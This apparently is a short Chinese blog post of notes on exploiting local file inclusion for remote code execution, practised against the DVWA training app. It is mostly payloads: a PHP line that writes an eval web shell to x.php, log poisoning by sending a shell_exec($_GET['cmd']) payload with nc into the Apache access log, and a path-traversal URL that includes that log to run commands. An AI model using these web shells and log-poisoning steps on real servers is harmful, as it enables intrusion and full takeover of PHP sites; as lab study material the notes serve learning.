远程执行文件包含

<?php fputs(fopen("x.php","w"),"<?php @eval(\$_POST['x']);?>");?>

 

写入日志文件

 

chmod 777 /var/log/httpd

 

nc xxx 80

<?php echo shell_exec($_GET['cmd']);?>

 

cat /var/log/httpd/access_log

 

xxx- - [08/Jan/2018:10:36:36 +0800] "<?php echo shell_exec($_GET['cmd']);?>" 400 226 "-" "-"

 

DVWA medium

 

 

 

http://xxx/dvwa/vulnerabilities/fi/?page=../../../../../../var/log/httpd/access_log&cmd=id

 

<?php @eval($_POST['x']);?>

 

 

 http://www.freebuf.com/articles/system/93323.html

 

posted @ 2018-01-08 09:44  Khazix  阅读(318)  评论(0编辑  收藏  举报